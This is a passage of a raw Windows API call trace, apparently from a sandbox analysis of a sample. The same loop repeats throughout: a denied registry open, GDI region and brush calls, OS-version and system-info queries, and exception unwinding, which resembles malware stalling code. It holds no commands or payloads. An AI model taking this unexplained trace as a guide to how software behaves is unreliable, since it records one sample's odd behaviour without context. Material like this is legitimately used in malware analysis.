hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.526] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb04027d [0017.526] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x15040713 [0017.526] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409f7 [0017.526] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409f8 [0017.526] CombineRgn (hrgnDst=0x10409f7, hrgnSrc1=0xb04027d, hrgnSrc2=0x15040713, iMode=1) returned 1 [0017.526] CombineRgn (hrgnDst=0x10409f8, hrgnSrc1=0xb04027d, hrgnSrc2=0x15040713, iMode=4) returned 2 [0017.526] CreateSolidBrush (color=0xff) returned 0x21009f6 [0017.526] CreateSolidBrush (color=0xff0000) returned 0x11009f9 [0017.526] DeleteObject (ho=0x11009f9) returned 1 [0017.526] DeleteObject (ho=0x15040713) returned 1 [0017.526] DeleteObject (ho=0xb04027d) returned 1 [0017.526] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.526] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.526] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.527] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.527] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.527] BeginPath (hdc=0x0) returned 0 [0017.527] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.527] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.527] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.527] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.527] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.527] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.527] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.527] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.527] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x16040713 [0017.527] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc04027d [0017.527] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409fa [0017.527] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409fb [0017.527] CombineRgn (hrgnDst=0x10409fa, hrgnSrc1=0x16040713, hrgnSrc2=0xc04027d, iMode=1) returned 1 [0017.527] CombineRgn (hrgnDst=0x10409fb, hrgnSrc1=0x16040713, hrgnSrc2=0xc04027d, iMode=4) returned 2 [0017.527] CreateSolidBrush (color=0xff) returned 0x21009f9 [0017.527] CreateSolidBrush (color=0xff0000) returned 0x11009fc [0017.527] DeleteObject (ho=0x11009fc) returned 1 [0017.527] DeleteObject (ho=0xc04027d) returned 1 [0017.527] DeleteObject (ho=0x16040713) returned 1 [0017.527] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.527] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.527] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.527] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.527] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.527] BeginPath (hdc=0x0) returned 0 [0017.527] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.527] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.527] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.527] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.527] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.527] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.528] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.528] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.528] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd04027d [0017.528] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x17040713 [0017.528] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409fd [0017.528] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409fe [0017.528] CombineRgn (hrgnDst=0x10409fd, hrgnSrc1=0xd04027d, hrgnSrc2=0x17040713, iMode=1) returned 1 [0017.528] CombineRgn (hrgnDst=0x10409fe, hrgnSrc1=0xd04027d, hrgnSrc2=0x17040713, iMode=4) returned 2 [0017.528] CreateSolidBrush (color=0xff) returned 0x21009fc [0017.528] CreateSolidBrush (color=0xff0000) returned 0x11009ff [0017.528] DeleteObject (ho=0x11009ff) returned 1 [0017.528] DeleteObject (ho=0x17040713) returned 1 [0017.528] DeleteObject (ho=0xd04027d) returned 1 [0017.528] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.528] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.528] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.528] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.528] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.528] BeginPath (hdc=0x0) returned 0 [0017.528] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.528] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.528] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.528] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.528] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.528] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.528] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.528] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.529] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x18040713 [0017.529] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe04027d [0017.529] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a00 [0017.529] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a01 [0017.529] CombineRgn (hrgnDst=0x1040a00, hrgnSrc1=0x18040713, hrgnSrc2=0xe04027d, iMode=1) returned 1 [0017.529] CombineRgn (hrgnDst=0x1040a01, hrgnSrc1=0x18040713, hrgnSrc2=0xe04027d, iMode=4) returned 2 [0017.529] CreateSolidBrush (color=0xff) returned 0x21009ff [0017.529] CreateSolidBrush (color=0xff0000) returned 0x1100a02 [0017.529] DeleteObject (ho=0x1100a02) returned 1 [0017.529] DeleteObject (ho=0xe04027d) returned 1 [0017.529] DeleteObject (ho=0x18040713) returned 1 [0017.529] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.529] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.529] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.529] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.529] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.529] BeginPath (hdc=0x0) returned 0 [0017.529] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.529] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.529] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.529] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.529] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.529] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.529] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.529] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.529] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf04027d [0017.529] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x19040713 [0017.529] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a03 [0017.529] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a04 [0017.529] CombineRgn (hrgnDst=0x1040a03, hrgnSrc1=0xf04027d, hrgnSrc2=0x19040713, iMode=1) returned 1 [0017.530] CombineRgn (hrgnDst=0x1040a04, hrgnSrc1=0xf04027d, hrgnSrc2=0x19040713, iMode=4) returned 2 [0017.530] CreateSolidBrush (color=0xff) returned 0x2100a02 [0017.530] CreateSolidBrush (color=0xff0000) returned 0x1100a05 [0017.530] DeleteObject (ho=0x1100a05) returned 1 [0017.530] DeleteObject (ho=0x19040713) returned 1 [0017.530] DeleteObject (ho=0xf04027d) returned 1 [0017.530] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.530] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.530] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.530] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.530] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.530] BeginPath (hdc=0x0) returned 0 [0017.530] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.530] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.530] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.530] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.530] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.530] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.530] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.530] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.530] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1a040713 [0017.530] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1004027d [0017.530] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a06 [0017.530] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a07 [0017.530] CombineRgn (hrgnDst=0x1040a06, hrgnSrc1=0x1a040713, hrgnSrc2=0x1004027d, iMode=1) returned 1 [0017.530] CombineRgn (hrgnDst=0x1040a07, hrgnSrc1=0x1a040713, hrgnSrc2=0x1004027d, iMode=4) returned 2 [0017.530] CreateSolidBrush (color=0xff) returned 0x2100a05 [0017.530] CreateSolidBrush (color=0xff0000) returned 0x1100a08 [0017.530] DeleteObject (ho=0x1100a08) returned 1 [0017.531] DeleteObject (ho=0x1004027d) returned 1 [0017.531] DeleteObject (ho=0x1a040713) returned 1 [0017.531] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.531] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.531] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.531] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.531] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.531] BeginPath (hdc=0x0) returned 0 [0017.531] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.531] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.531] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.531] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.531] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.531] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.531] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.531] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.531] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1104027d [0017.531] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1b040713 [0017.531] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a09 [0017.531] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a0a [0017.531] CombineRgn (hrgnDst=0x1040a09, hrgnSrc1=0x1104027d, hrgnSrc2=0x1b040713, iMode=1) returned 1 [0017.531] CombineRgn (hrgnDst=0x1040a0a, hrgnSrc1=0x1104027d, hrgnSrc2=0x1b040713, iMode=4) returned 2 [0017.531] CreateSolidBrush (color=0xff) returned 0x2100a08 [0017.531] CreateSolidBrush (color=0xff0000) returned 0x1100a0b [0017.531] DeleteObject (ho=0x1100a0b) returned 1 [0017.531] DeleteObject (ho=0x1b040713) returned 1 [0017.531] DeleteObject (ho=0x1104027d) returned 1 [0017.531] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.531] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.531] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.532] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.532] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.532] BeginPath (hdc=0x0) returned 0 [0017.532] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.532] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.532] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.532] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.532] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.532] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.532] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.532] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.532] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1c040713 [0017.532] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1204027d [0017.532] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a0c [0017.532] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a0d [0017.532] CombineRgn (hrgnDst=0x1040a0c, hrgnSrc1=0x1c040713, hrgnSrc2=0x1204027d, iMode=1) returned 1 [0017.532] CombineRgn (hrgnDst=0x1040a0d, hrgnSrc1=0x1c040713, hrgnSrc2=0x1204027d, iMode=4) returned 2 [0017.532] CreateSolidBrush (color=0xff) returned 0x2100a0b [0017.532] CreateSolidBrush (color=0xff0000) returned 0x1100a0e [0017.532] DeleteObject (ho=0x1100a0e) returned 1 [0017.532] DeleteObject (ho=0x1204027d) returned 1 [0017.532] DeleteObject (ho=0x1c040713) returned 1 [0017.532] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.532] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.532] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.532] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.532] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.532] BeginPath (hdc=0x0) returned 0 [0017.532] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.532] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.532] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.532] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.532] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.532] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.533] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.533] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.533] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1304027d [0017.533] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1d040713 [0017.533] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a0f [0017.533] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a10 [0017.533] CombineRgn (hrgnDst=0x1040a0f, hrgnSrc1=0x1304027d, hrgnSrc2=0x1d040713, iMode=1) returned 1 [0017.533] CombineRgn (hrgnDst=0x1040a10, hrgnSrc1=0x1304027d, hrgnSrc2=0x1d040713, iMode=4) returned 2 [0017.533] CreateSolidBrush (color=0xff) returned 0x2100a0e [0017.533] CreateSolidBrush (color=0xff0000) returned 0x1100a11 [0017.533] DeleteObject (ho=0x1100a11) returned 1 [0017.533] DeleteObject (ho=0x1d040713) returned 1 [0017.533] DeleteObject (ho=0x1304027d) returned 1 [0017.533] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.533] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.533] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.533] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.533] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.533] BeginPath (hdc=0x0) returned 0 [0017.533] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.533] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.533] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.533] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.533] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.533] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.533] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.533] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.534] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1e040713 [0017.534] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1404027d [0017.534] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a12 [0017.534] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a13 [0017.534] CombineRgn (hrgnDst=0x1040a12, hrgnSrc1=0x1e040713, hrgnSrc2=0x1404027d, iMode=1) returned 1 [0017.534] CombineRgn (hrgnDst=0x1040a13, hrgnSrc1=0x1e040713, hrgnSrc2=0x1404027d, iMode=4) returned 2 [0017.534] CreateSolidBrush (color=0xff) returned 0x2100a11 [0017.534] CreateSolidBrush (color=0xff0000) returned 0x1100a14 [0017.534] DeleteObject (ho=0x1100a14) returned 1 [0017.534] DeleteObject (ho=0x1404027d) returned 1 [0017.534] DeleteObject (ho=0x1e040713) returned 1 [0017.534] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, 